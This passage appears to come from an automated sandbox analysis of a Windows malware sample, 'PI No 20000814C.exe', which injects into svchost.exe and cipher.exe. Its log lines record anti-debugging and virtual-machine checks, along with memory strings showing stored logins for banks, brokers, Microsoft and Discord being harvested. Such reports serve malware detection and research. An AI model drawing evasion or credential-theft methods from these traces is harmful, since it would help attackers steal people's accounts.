            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F6F65E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F63A2B
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F63D4E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F6BF27
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose,4_2_032CBBC0
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F04AFE
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 227j94.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 227j94.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 227j94.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 227j94.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964875=
            Source: 227j94.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t
            Source: 227j94.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 227j94.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hange Transaction PasswordVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 227j94.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552}
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware
            Source: 227j94.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11
            Source: 227j94.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: formVMware20,11696487552
            Source: firefox.exe, 00000008.00000002.2521667010.000002456C8AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: 227j94.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 227j94.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 227j94.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 227j94.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 227j94.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,1169648
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696487552x
            Source: 227j94.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 227j94.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 227j94.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: cipher.exe, 00000004.00000002.4528848749.000000000833A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kofamerica.comVMware20,11696487552x
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4524496472.000000000100F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
            Source: 227j94.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 227j94.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\PI No 20000814C.exeAPI call chain: ExitProcess graph end nodegraph_0-98872
            Source: C:\Users\user\Desktop\PI No 20000814C.exeAPI call chain: ExitProcess graph end nodegraph_0-101082
            Source: C:\Users\user\Desktop\PI No 20000814C.exeAPI call chain: ExitProcess graph end nodegraph_0-98443
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00487383 LdrLoadDll,2_2_00487383
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F741FD BlockInput,0_2_00F741FD
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F03B4C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F35CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00F35CCC
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_0102B090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_0102B090
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_018E3580 mov eax, dword ptr fs:[00000030h]0_2_018E3580
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_018E3520 mov eax, dword ptr fs:[00000030h]0_2_018E3520
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_018E1ED0 mov eax, dword ptr fs:[00000030h]0_2_018E1ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300634F mov eax, dword ptr fs:[00000030h]2_2_0300634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h]2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h]2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h]2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h]2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h]2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h]2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h]2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h]2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA250 mov eax, dword ptr fs:[00000030h]2_2_02FEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h]2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h]2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h]2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300625D mov eax, dword ptr fs:[00000030h]2_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]2_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]2_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
